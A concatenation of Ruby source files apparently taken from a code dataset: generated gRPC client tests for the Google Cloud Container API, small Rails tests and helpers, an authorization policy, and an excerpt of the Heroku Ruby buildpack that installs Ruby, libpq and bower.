client.complete_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.complete_ip_rotation ::Google::Cloud::Container::V1::CompleteIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, complete_ip_rotation_client_stub.call_rpc_count
end
end
def test_set_node_pool_size
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
node_count = 42
name = "hello world"
set_node_pool_size_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_node_pool_size, name
assert_kind_of ::Google::Cloud::Container::V1::SetNodePoolSizeRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal 42, request["node_count"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_node_pool_size_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_node_pool_size({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_node_pool_size project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_node_pool_size ::Google::Cloud::Container::V1::SetNodePoolSizeRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_node_pool_size({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_node_pool_size ::Google::Cloud::Container::V1::SetNodePoolSizeRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_count: node_count, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_node_pool_size_client_stub.call_rpc_count
end
end
def test_set_network_policy
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
network_policy = {}
name = "hello world"
set_network_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_network_policy, name
assert_kind_of ::Google::Cloud::Container::V1::SetNetworkPolicyRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NetworkPolicy), request["network_policy"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_network_policy_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_network_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_network_policy project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_network_policy ::Google::Cloud::Container::V1::SetNetworkPolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_network_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_network_policy ::Google::Cloud::Container::V1::SetNetworkPolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, network_policy: network_policy, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_network_policy_client_stub.call_rpc_count
end
end
def test_set_maintenance_policy
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
maintenance_policy = {}
name = "hello world"
set_maintenance_policy_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_maintenance_policy, name
assert_kind_of ::Google::Cloud::Container::V1::SetMaintenancePolicyRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::MaintenancePolicy), request["maintenance_policy"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_maintenance_policy_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_maintenance_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_maintenance_policy project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_maintenance_policy ::Google::Cloud::Container::V1::SetMaintenancePolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_maintenance_policy({ project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_maintenance_policy ::Google::Cloud::Container::V1::SetMaintenancePolicyRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, maintenance_policy: maintenance_policy, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_maintenance_policy_client_stub.call_rpc_count
end
end
def test_list_usable_subnetworks
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::ListUsableSubnetworksResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
filter = "hello world"
page_size = 42
page_token = "hello world"
list_usable_subnetworks_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_usable_subnetworks, name
assert_kind_of ::Google::Cloud::Container::V1::ListUsableSubnetworksRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["filter"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_usable_subnetworks_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_usable_subnetworks({ parent: parent, filter: filter, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_usable_subnetworks parent: parent, filter: filter, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_usable_subnetworks ::Google::Cloud::Container::V1::ListUsableSubnetworksRequest.new(parent: parent, filter: filter, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_usable_subnetworks({ parent: parent, filter: filter, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_usable_subnetworks ::Google::Cloud::Container::V1::ListUsableSubnetworksRequest.new(parent: parent, filter: filter, page_size: page_size, page_token: page_token), grpc_options do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_usable_subnetworks_client_stub.call_rpc_count
end
end
def test_configure
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
client = block_config = config = nil
Gapic::ServiceStub.stub :new, nil do
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
end
config = client.configure do |c|
block_config = c
end
assert_same block_config, config
assert_kind_of ::Google::Cloud::Container::V1::ClusterManager::Client::Configuration, config
end
end
| 44.619179 | 388 | 0.722336 |
4af0431b68e58bc365ec728f87da6412c6ecf34e | 75 | require 'test_helper'
class ContentsHelperTest < ActionView::TestCase
end
| 15 | 47 | 0.826667 |
012468e127766e0847185840e9e68a28050922b7 | 139 | require 'test_helper'
class UserContactsControllerTest < ActionController::TestCase
# test "the truth" do
# assert true
# end
end
| 17.375 | 61 | 0.741007 |
1179652d720b9e1076d2b3c5ecb7bb9165eabd91 | 636 | if defined?(Enumerator::Lazy)
covers 'facets/enumerator/lazy/squeeze'
test_case Enumerator::Lazy do
method :squeeze do
# make an Enumerable class to test
eC = Class.new do
include Enumerable
def initialize(*a)
@a = a
end
def each(&b)
@a.each(&b)
end
end
test 'example (default)' do
e = eC.new(1,2,2,3,3,2,1)
e.lazy.squeeze.to_a.assert == [1,2,3,2,1]
end
test 'example (with argument)' do
e = eC.new(1,2,2,3,3,2,1)
e.lazy.squeeze(*[3]).to_a.assert == [1,2,2,3,2,1]
end
end
end
end
| 18.705882 | 57 | 0.523585 |
8798de6e517a20fd085fb18eac82f80cf961cd20 | 597 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
package 'php8.0-xsl'
| 37.3125 | 74 | 0.758794 |
39b7d5bcca305aed929f8e5b88f19bdf1453a220 | 1,202 | # frozen_string_literal: true
module Script
module Layers
module Domain
module Errors
class PushPackageNotFoundError < ScriptProjectError; end
class InvalidExtensionPointError < ScriptProjectError
attr_reader :type
def initialize(type)
super()
@type = type
end
end
class MissingScriptConfigFieldError < ScriptProjectError
attr_reader :field, :filename
def initialize(field:, filename:)
super()
@field = field
@filename = filename
end
end
class ScriptNotFoundError < ScriptProjectError
attr_reader :title, :extension_point_type
def initialize(extension_point_type, title)
super()
@title = title
@extension_point_type = extension_point_type
end
end
class MetadataNotFoundError < ScriptProjectError
attr_reader :filename
def initialize(filename)
super()
@filename = filename
end
end
class MetadataValidationError < ScriptProjectError; end
end
end
end
end
| 25.041667 | 64 | 0.591514 |
bb34b926a3e5055221905726812dd60e29d53630 | 623 | module EventHelper
def past_due(event)
if !event.follow_up_date.nil? && event.follow_up_date < Date.today
link_to "PAST DUE", event_path(event)
else
link_to event.name, event_path(event)
end
end
def li_id_past_due(event)
if !event.follow_up_date.nil? && event.follow_up_date < Date.today
"id=past-due"
end
end
def display_follow_up_date(event)
if !event.follow_up_date.nil?
presentable_date(event.follow_up_date)
else
"N/A"
end
end
def follow_up_display(event)
if event.follow_up == true
"Yes"
else
"No"
end
end
end
| 18.323529 | 70 | 0.654896 |
2606cb77f4c601c1a5a2d1c624e274a87e2cd206 | 545 | # Policy for team members. It does not authorize anything unless the author of
# the action is an owner. An owner is either an admin of Portus or an owner of
# the team itself.
class TeamUserPolicy
attr_reader :user, :team_user
def initialize(user, team_user)
raise Pundit::NotAuthorizedError, "must be logged in" unless user
@user = user
@team_user = team_user
end
def owner?
user.admin? || @team_user.team.owners.exists?(user.id)
end
alias destroy? owner?
alias update? owner?
alias create? owner?
end
| 24.772727 | 78 | 0.713761 |
79a1cf038c8fd4aa645f8730532d1895abaf87d4 | 41,288 | require "tmpdir"
require "digest/md5"
require "benchmark"
require "rubygems"
require "language_pack"
require "language_pack/base"
require "language_pack/ruby_version"
require "language_pack/helpers/nodebin"
require "language_pack/helpers/node_installer"
require "language_pack/helpers/yarn_installer"
require "language_pack/helpers/jvm_installer"
require "language_pack/version"
# base Ruby Language Pack. This is for any base ruby app.
class LanguagePack::Ruby < LanguagePack::Base
NAME = "ruby"
LIBYAML_VERSION = "0.1.7"
LIBYAML_PATH = "libyaml-#{LIBYAML_VERSION}"
RBX_BASE_URL = "http://binaries.rubini.us/heroku"
NODE_BP_PATH = "vendor/node/bin"
# detects if this is a valid Ruby app
# @return [Boolean] true if it's a Ruby app
def self.use?
instrument "ruby.use" do
File.exist?("Gemfile")
end
end
def self.bundler
@@bundler ||= LanguagePack::Helpers::BundlerWrapper.new.install
end
def bundler
self.class.bundler
end
def initialize(build_path, cache_path=nil)
super(build_path, cache_path)
@fetchers[:mri] = LanguagePack::Fetcher.new(VENDOR_URL, @stack)
@fetchers[:rbx] = LanguagePack::Fetcher.new(RBX_BASE_URL, @stack)
@node_installer = LanguagePack::Helpers::NodeInstaller.new
@yarn_installer = LanguagePack::Helpers::YarnInstaller.new
@jvm_installer = LanguagePack::Helpers::JvmInstaller.new(slug_vendor_jvm, @stack)
end
def name
"Ruby"
end
def default_addons
instrument "ruby.default_addons" do
add_dev_database_addon
end
end
def default_config_vars
instrument "ruby.default_config_vars" do
vars = {
"LANG" => env("LANG") || "en_US.UTF-8",
}
ruby_version.jruby? ? vars.merge({
"JAVA_OPTS" => default_java_opts,
"JRUBY_OPTS" => default_jruby_opts
}) : vars
end
end
def default_process_types
instrument "ruby.default_process_types" do
{
"rake" => "bundle exec rake",
"console" => "bundle exec irb"
}
end
end
def best_practice_warnings
if bundler.has_gem?("asset_sync")
warn(<<-WARNING)
You are using the `asset_sync` gem.
This is not recommended.
See https://devcenter.heroku.com/articles/please-do-not-use-asset-sync for more information.
WARNING
end
end
def compile
instrument 'ruby.compile' do
# check for new app at the beginning of the compile
new_app?
Dir.chdir(build_path)
remove_vendor_bundle
warn_bundler_upgrade
install_ruby
install_jvm
setup_language_pack_environment
setup_export
setup_profiled
allow_git do
vendor_libpq
install_bundler_in_app
build_bundler("development:test")
post_bundler
create_database_yml
install_binaries
install_bower
install_bower_defined_dependencies
run_assets_precompile_rake_task
end
config_detect
best_practice_warnings
warn_outdated_ruby
cleanup
super
end
rescue => e
warn_outdated_ruby
raise e
end
def vendor_libpq
# Check for existing libraries
return unless File.exist?("/usr/lib/x86_64-linux-gnu/libpq.so.5.11")
return unless ENV['STACK'] == 'heroku-18'
topic("Vendoring libpq 5.12.1")
@metadata.fetch("vendor_libpq12") do
warn(<<~EOF)
Replacing libpq with version libpq 5.12.1
This version includes a bug fix that can cause an exception
on boot for applications with incorrectly configured connection
values. For more information see:
https://devcenter.heroku.com/articles/libpq-5-12-1-breaking-connection-behavior
If your application breaks you can rollback to your last build.
You can also temporarially opt out of this behavior by setting:
```
$ heroku config:set HEROKU_SKIP_LIBPQ12=1
```
In the future libpq 5.12 will be the default on the platform and
you will not be able to opt-out of the library. For more information see:
https://devcenter.heroku.com/articles/libpq-5-12-1-breaking-connection-behavior
EOF
"true" # Set future cache value
end
Dir.chdir("vendor") do
@fetchers[:mri].fetch("libpq5_12.1-1.deb")
run!("dpkg -x libpq5_12.1-1.deb .")
run!("rm libpq5_12.1-1.deb")
load_libpq_12_unless_env_var = <<~EOF
if [ "$HEROKU_SKIP_LIBPQ12" == "" ]; then
export LD_LIBRARY_PATH="$HOME/vendor/usr/lib/x86_64-linux-gnu/:$LD_LIBRARY_PATH"
fi
EOF
add_to_export load_libpq_12_unless_env_var
add_to_profiled load_libpq_12_unless_env_var
ENV["LD_LIBRARY_PATH"] = Dir.pwd + "/usr/lib/x86_64-linux-gnu:#{ENV["LD_LIBRARY_PATH"]}"
end
end
def cleanup
end
def config_detect
end
def install_bower
topic 'Installing bower'
pipe('npm install -g [email protected]')
unless $?.success?
error "Can't install Bower 1.8.8"
end
end
def install_bower_defined_dependencies
topic 'Installing dependencies via bower'
pipe('bundle exec bowndler bower_configure')
pipe('.heroku/node/bin/bower install --config.storage.packages=vendor/bower/packages --config.storage.registry=vendor/bower/registry --config.tmp=vendor/bower/tmp 2>&1')
FileUtils.rm_rf("vendor/bower/tmp")
end
private
def default_malloc_arena_max?
return true if @metadata.exists?("default_malloc_arena_max")
return @metadata.touch("default_malloc_arena_max") if new_app?
return false
end
def stack_not_14_not_16?
case stack
when "cedar-14", "heroku-16"
return false
else
return true
end
end
def warn_bundler_upgrade
old_bundler_version = @metadata.read("bundler_version").chomp if @metadata.exists?("bundler_version")
if old_bundler_version && old_bundler_version != bundler.version
warn(<<-WARNING, inline: true)
Your app was upgraded to bundler #{ bundler.version }.
Previously you had a successful deploy with bundler #{ old_bundler_version }.
If you see problems related to the bundler version please refer to:
https://devcenter.heroku.com/articles/bundler-version#known-upgrade-issues
WARNING
end
end
# the base PATH environment variable to be used
# @return [String] the resulting PATH
def default_path
# need to remove bin/ folder since it links
# to the wrong --prefix ruby binstubs
# breaking require. This only applies to Ruby 1.9.2 and 1.8.7.
safe_binstubs = binstubs_relative_paths - ["bin"]
paths = [
ENV["PATH"],
"bin",
system_paths,
]
paths.unshift("#{slug_vendor_jvm}/bin") if ruby_version.jruby?
paths.unshift(safe_binstubs)
paths.join(":")
end
def binstubs_relative_paths
[
"bin",
bundler_binstubs_path,
"#{slug_vendor_base}/bin"
]
end
def system_paths
"/usr/local/bin:/usr/bin:/bin"
end
def self.slug_vendor_base
command = %q(ruby -e "require 'rbconfig';puts \"vendor/bundle/#{RUBY_ENGINE}/#{RbConfig::CONFIG['ruby_version']}\"")
slug_vendor_base = run_no_pipe(command, user_env: true).chomp
error "Problem detecting bundler vendor directory: #{@slug_vendor_base}" unless $?.success?
return slug_vendor_base
end
# the relative path to the bundler directory of gems
# @return [String] resulting path
def slug_vendor_base
instrument 'ruby.slug_vendor_base' do
@slug_vendor_base ||= self.class.slug_vendor_base
end
end
# the relative path to the vendored ruby directory
# @return [String] resulting path
def slug_vendor_ruby
"vendor/#{ruby_version.version_without_patchlevel}"
end
# the relative path to the vendored jvm
# @return [String] resulting path
def slug_vendor_jvm
"vendor/jvm"
end
# the absolute path of the build ruby to use during the buildpack
# @return [String] resulting path
def build_ruby_path
"/tmp/#{ruby_version.version_without_patchlevel}"
end
# fetch the ruby version from bundler
# @return [String, nil] returns the ruby version if detected or nil if none is detected
def ruby_version
instrument 'ruby.ruby_version' do
return @ruby_version if @ruby_version
new_app = !File.exist?("vendor/heroku")
last_version_file = "buildpack_ruby_version"
last_version = nil
last_version = @metadata.read(last_version_file).chomp if @metadata.exists?(last_version_file)
@ruby_version = LanguagePack::RubyVersion.new(bundler.ruby_version,
is_new: new_app,
last_version: last_version)
return @ruby_version
end
end
# default JAVA_OPTS
# return [String] string of JAVA_OPTS
def default_java_opts
"-Dfile.encoding=UTF-8"
end
def set_jvm_max_heap
<<-EOF
limit=$(ulimit -u)
case $limit in
512) # 2X, private-s: memory.limit_in_bytes=1073741824
echo "$opts -Xmx671m -XX:CICompilerCount=2"
;;
16384) # perf-m, private-m: memory.limit_in_bytes=2684354560
echo "$opts -Xmx2g"
;;
32768) # perf-l, private-l: memory.limit_in_bytes=15032385536
echo "$opts -Xmx12g"
;;
*) # Free, Hobby, 1X: memory.limit_in_bytes=536870912
echo "$opts -Xmx300m -Xss512k -XX:CICompilerCount=2"
;;
esac
EOF
end
def set_java_mem
<<-EOF
if ! [[ "${JAVA_OPTS}" == *-Xmx* ]]; then
export JAVA_MEM=${JAVA_MEM:--Xmx${JVM_MAX_HEAP:-384}m}
fi
EOF
end
def set_default_web_concurrency
<<-EOF
case $(ulimit -u) in
256)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-512}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-2}
;;
512)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-1024}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-4}
;;
16384)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-2560}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-8}
;;
32768)
export HEROKU_RAM_LIMIT_MB=${HEROKU_RAM_LIMIT_MB:-6144}
export WEB_CONCURRENCY=${WEB_CONCURRENCY:-16}
;;
*)
;;
esac
EOF
end
# default JRUBY_OPTS
# return [String] string of JRUBY_OPTS
def default_jruby_opts
"-Xcompile.invokedynamic=false"
end
# default Java Xmx
# return [String] string of Java Xmx
def default_java_mem
"-Xmx${JVM_MAX_HEAP:-384}m"
end
# sets up the environment variables for the build process
def setup_language_pack_environment
instrument 'ruby.setup_language_pack_environment' do
if ruby_version.jruby?
ENV["PATH"] += ":bin"
ENV["JAVA_MEM"] = run(<<-SHELL).chomp
#{set_jvm_max_heap}
echo #{default_java_mem}
SHELL
ENV["JRUBY_OPTS"] = env('JRUBY_BUILD_OPTS') || env('JRUBY_OPTS')
ENV["JAVA_HOME"] = @jvm_installer.java_home
end
setup_ruby_install_env
ENV["PATH"] += ":#{node_preinstall_bin_path}" if node_js_installed?
ENV["PATH"] += ":#{yarn_preinstall_bin_path}" if !yarn_not_preinstalled?
# By default Node can address 1.5GB of memory, a limitation it inherits from
# the underlying v8 engine. This can occasionally cause issues during frontend
# builds where memory use can exceed this threshold.
#
# This passes an argument to all Node processes during the build, so that they
# can take advantage of all available memory on the build dynos.
ENV["NODE_OPTIONS"] ||= "--max_old_space_size=2560"
# TODO when buildpack-env-args rolls out, we can get rid of
# ||= and the manual setting below
default_config_vars.each do |key, value|
ENV[key] ||= value
end
ENV["GEM_PATH"] = slug_vendor_base
ENV["GEM_HOME"] = slug_vendor_base
ENV["PATH"] = default_path
end
end
# Sets up the environment variables for subsequent processes run by
# muiltibuildpack. We can't use profile.d because $HOME isn't set up
def setup_export
instrument 'ruby.setup_export' do
paths = ENV["PATH"].split(":")
set_export_override "GEM_PATH", "#{build_path}/#{slug_vendor_base}:$GEM_PATH"
set_export_default "LANG", "en_US.UTF-8"
set_export_override "PATH", paths.map { |path| /^\/.*/ !~ path ? "#{build_path}/#{path}" : path }.join(":")
if ruby_version.jruby?
add_to_export set_jvm_max_heap
add_to_export set_java_mem
set_export_default "JAVA_OPTS", default_java_opts
set_export_default "JRUBY_OPTS", default_jruby_opts
end
end
end
# sets up the profile.d script for this buildpack
def setup_profiled
instrument 'setup_profiled' do
profiled_path = [binstubs_relative_paths.map {|path| "$HOME/#{path}" }.join(":")]
profiled_path << "vendor/#{@yarn_installer.binary_path}" if has_yarn_binary?
profiled_path << "$PATH"
set_env_default "LANG", "en_US.UTF-8"
set_env_override "GEM_PATH", "$HOME/#{slug_vendor_base}:$GEM_PATH"
set_env_override "PATH", profiled_path.join(":")
set_env_default "MALLOC_ARENA_MAX", "2" if default_malloc_arena_max?
add_to_profiled set_default_web_concurrency if env("SENSIBLE_DEFAULTS")
if ruby_version.jruby?
add_to_profiled set_jvm_max_heap
add_to_profiled set_java_mem
set_env_default "JAVA_OPTS", default_java_opts
set_env_default "JRUBY_OPTS", default_jruby_opts
end
end
end
def warn_outdated_ruby
return unless defined?(@outdated_version_check)
@warn_outdated ||= begin
@outdated_version_check.join
warn_outdated_minor
warn_outdated_eol
true
end
end
def warn_outdated_eol
return unless @outdated_version_check.maybe_eol?
if @outdated_version_check.eol?
warn(<<~WARNING)
EOL Ruby Version
You are using a Ruby version that has reached its End of Life (EOL)
We strongly suggest you upgrade to Ruby #{@outdated_version_check.suggest_ruby_eol_version} or later
Your current Ruby version no longer receives security updates from
Ruby Core and may have serious vulnerabilities. While you will continue
to be able to deploy on Heroku with this Ruby version you must upgrade
to a non-EOL version to be eligable to receive support.
Upgrade your Ruby version as soon as possible.
For a list of supported Ruby versions see:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
WARNING
else
# Maybe EOL
warn(<<~WARNING)
Potential EOL Ruby Version
You are using a Ruby version that has either reached its End of Life (EOL)
or will reach its End of Life on December 25th of this year.
We suggest you upgrade to Ruby #{@outdated_version_check.suggest_ruby_eol_version} or later
Once a Ruby version becomes EOL, it will no longer receive
security updates from Ruby core and may have serious vulnerabilities.
Please upgrade your Ruby version.
For a list of supported Ruby versions see:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
WARNING
end
end
def warn_outdated_minor
return if @outdated_version_check.latest_minor_version?
warn(<<~WARNING)
There is a more recent Ruby version available for you to use:
#{@outdated_version_check.suggested_ruby_minor_version}
The latest version will include security and bug fixes, we always recommend
running the latest version of your minor release.
Please upgrade your Ruby version.
For all available Ruby versions see:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
WARNING
end
# install the vendored ruby
# @return [Boolean] true if it installs the vendored ruby and false otherwise
def install_ruby
instrument 'ruby.install_ruby' do
return false unless ruby_version
installer = LanguagePack::Installers::RubyInstaller.installer(ruby_version).new(@stack)
if ruby_version.build?
installer.fetch_unpack(ruby_version, build_ruby_path, true)
end
installer.install(ruby_version, slug_vendor_ruby)
@outdated_version_check = LanguagePack::Helpers::OutdatedRubyVersion.new(
current_ruby_version: ruby_version,
fetcher: installer.fetcher
)
@outdated_version_check.call
@metadata.write("buildpack_ruby_version", ruby_version.version_for_download)
topic "Using Ruby version: #{ruby_version.version_for_download}"
if !ruby_version.set
warn(<<-WARNING)
You have not declared a Ruby version in your Gemfile.
To set your Ruby version add this line to your Gemfile:
#{ruby_version.to_gemfile}
# See https://devcenter.heroku.com/articles/ruby-versions for more information.
WARNING
end
end
true
rescue LanguagePack::Fetcher::FetchError => error
if stack == "heroku-18" && ruby_version.version_for_download.match?(/ruby-2\.(2|3)/)
message = <<ERROR
An error occurred while installing #{ruby_version.version_for_download}
This version of Ruby is not available on Heroku-18. The minimum supported version
of Ruby on the Heroku-18 stack can found at:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
ERROR
ci_message = <<ERROR
If you did not intend to build your app for CI on the Heroku-18 stack
please set your stack version manually in the `app.json`:
```
"stack": "heroku-16"
```
More information about this change in behavior can be found at:
https://help.heroku.com/3Y1HEXGJ/why-doesn-t-ruby-2-3-7-work-in-my-ci-tests
ERROR
if env("CI")
mcount "fail.bad_version_fetch.heroku-18.ci"
message << ci_message
else
mcount "fail.bad_version_fetch.heroku-18"
end
error message
end
mcount "fail.bad_version_fetch"
mcount "fail.bad_version_fetch.#{ruby_version.version_for_download}"
message = <<ERROR
An error occurred while installing #{ruby_version.version_for_download}
Heroku recommends you use the latest supported Ruby version listed here:
https://devcenter.heroku.com/articles/ruby-support#supported-runtimes
For more information on syntax for declaring a Ruby version see:
https://devcenter.heroku.com/articles/ruby-versions
ERROR
if ruby_version.jruby?
message << "Note: Only JRuby 1.7.13 and newer are supported on Cedar-14"
end
message << "\nDebug Information"
message << error.message
error message
end
def new_app?
@new_app ||= !File.exist?("vendor/heroku")
end
# vendors JVM into the slug for JRuby
def install_jvm(forced = false)
instrument 'ruby.install_jvm' do
if ruby_version.jruby? || forced
@jvm_installer.install(ruby_version.engine_version, forced)
end
end
end
# find the ruby install path for its binstubs during build
# @return [String] resulting path or empty string if ruby is not vendored
def ruby_install_binstub_path
@ruby_install_binstub_path ||=
if ruby_version.build?
"#{build_ruby_path}/bin"
elsif ruby_version
"#{slug_vendor_ruby}/bin"
else
""
end
end
# setup the environment so we can use the vendored ruby
def setup_ruby_install_env
instrument 'ruby.setup_ruby_install_env' do
ENV["PATH"] = "#{File.expand_path(ruby_install_binstub_path)}:#{ENV["PATH"]}"
if ruby_version.jruby?
ENV['JAVA_OPTS'] = default_java_opts
end
end
end
# installs vendored gems into the slug
def install_bundler_in_app
instrument 'ruby.install_language_pack_gems' do
FileUtils.mkdir_p(slug_vendor_base)
Dir.chdir(slug_vendor_base) do |dir|
`cp -R #{bundler.bundler_path}/. .`
end
# write bundler shim, so we can control the version bundler used
# Ruby 2.6.0 started vendoring bundler
write_bundler_shim("vendor/bundle/bin") if ruby_version.vendored_bundler?
end
end
# default set of binaries to install
# @return [Array] resulting list
def binaries
add_node_js_binary + add_yarn_binary
end
# vendors binaries into the slug
def install_binaries
